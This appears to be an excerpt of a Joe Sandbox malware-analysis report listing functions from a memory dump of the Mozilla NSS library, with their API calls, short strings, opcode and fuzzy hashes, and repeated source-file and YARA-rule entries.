                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                      • String ID: %d.%d
                                                                                                                                                                                                                                                      • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                      • Opcode ID: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
                                                                                                                                                                                                                                                      • Instruction ID: bce491581265a025431ac02413924f763edbf379fa0a1b2c1a4bb7a2a0b011fa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF31D6B6E042186BEB10EBA19C01FFF7768EF80349F050429ED159B791EB319905CBE6
                                                                                                                                                                                                                                                      Function 6C4E4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3('8Nl,00000000,00000000,?,?,6C4E3827,?,00000000), ref: 6C4E4D0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C4E4D22
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                                                      • String ID: '8Nl
                                                                                                                                                                                                                                                      • API String ID: 1521942269-472363851
                                                                                                                                                                                                                                                      • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                      • Instruction ID: faaf1da02f076401c36e61d6fa22b85c5f9c96ca1c42ad876172112f7ffff881
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94F0623260123467EB108DAAAC80F8737DC9B496FFF161271ED28CBB91E621DC0586E1
                                                                                                                                                                                                                                                      Function 6C50AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C50AF78
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46ACE2
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: malloc.MOZGLUE(00000001), ref: 6C46ACEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C46AD02
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: TlsGetValue.KERNEL32 ref: 6C46AD3C
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: calloc.MOZGLUE(00000001,?), ref: 6C46AD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46ADC0
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46AE8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C46ACC0: free.MOZGLUE(?), ref: 6C46AEAB
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6C5D3084,6C5D02AC,00000090), ref: 6C50AF94
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                      • String ID: SSL
                                                                                                                                                                                                                                                      • API String ID: 2424436289-2135378647
                                                                                                                                                                                                                                                      • Opcode ID: 73936de93013c89a42cc82dbfb6ecd4d6409fc77ff8536af8c1f625d3f5eca27
                                                                                                                                                                                                                                                      • Instruction ID: e23d0bc0c6a8536e72d1d913debf15ea6bdcd3e84c37e453e18f9f461038c29f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73936de93013c89a42cc82dbfb6ecd4d6409fc77ff8536af8c1f625d3f5eca27
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 732143B6706B48DACB00EF51AD837127AF2B343708B529129C1199BF25D73172489FEE
                                                                                                                                                                                                                                                      Function 6C460F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C461370: GetSystemInfo.KERNEL32(?,?,?,?,6C460936,?,6C460F20,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000), ref: 6C46138F
                                                                                                                                                                                                                                                      • PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                        • Part of subcall function 6C461110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461130
                                                                                                                                                                                                                                                        • Part of subcall function 6C461110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461142
                                                                                                                                                                                                                                                        • Part of subcall function 6C461110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001), ref: 6C461167
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                                                                                                                                                      • String ID: clock
                                                                                                                                                                                                                                                      • API String ID: 536403800-3195780754
                                                                                                                                                                                                                                                      • Opcode ID: 72a50c549e850b09c088389728f7aa62c5b23060bfd9b6e7e227a3515064e803
                                                                                                                                                                                                                                                      • Instruction ID: ae073eea65f042f11a716f09c1e9e84661f58f9c18057ff458f0a46d82beb7c7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72a50c549e850b09c088389728f7aa62c5b23060bfd9b6e7e227a3515064e803
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90D0223160020415C600A297AC45F9AB2BCC7C327AF00082AE00882E048B2574EBC2AD
                                                                                                                                                                                                                                                      Function 6C4D0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$calloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3339632435-0
                                                                                                                                                                                                                                                      • Opcode ID: 06c9ce6ee669cd0872f923f964c6b59c93e15fd9b3c3c540eef7dc38f8c036a7
                                                                                                                                                                                                                                                      • Instruction ID: 9faeb92f070ff0a36f6b37508af881ab9ec881005d8387683d97c9dab4499168
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c9ce6ee669cd0872f923f964c6b59c93e15fd9b3c3c540eef7dc38f8c036a7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E31A070A457968BDB00FF39C854E5977A4BF06309F03462DD8888BB11DB30E485CA89
                                                                                                                                                                                                                                                      Function 6C4D0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4D0F5B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2332725481-0
                                                                                                                                                                                                                                                      • Opcode ID: 90bd46e8e4b80a84e178155d48dd2ee85f2ecc2732715ae181558b40d313d250
                                                                                                                                                                                                                                                      • Instruction ID: e88bea8112d22613ed99f8c3dea35be1ec8f558f1d98004385a495c7f9564372
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90bd46e8e4b80a84e178155d48dd2ee85f2ecc2732715ae181558b40d313d250
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 900128B1E012909BE710B73A9D04E567AACEF82259B130129EC18C7A21E770E805C2E7
                                                                                                                                                                                                                                                      Function 6C481EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                                      • Opcode ID: eb6980ff63f7418b59a053bccab6031837ab5df54200871fcb502bc07e3f4ea8
                                                                                                                                                                                                                                                      • Instruction ID: 8fadb46bb95f33f37450bc0e64b947a621f7e139353adc2e5b8383532bc84104
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb6980ff63f7418b59a053bccab6031837ab5df54200871fcb502bc07e3f4ea8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0E9B17015016BEB00EB6ADC89E27736CEF45195B040439ED1DC7B00D726F51187F5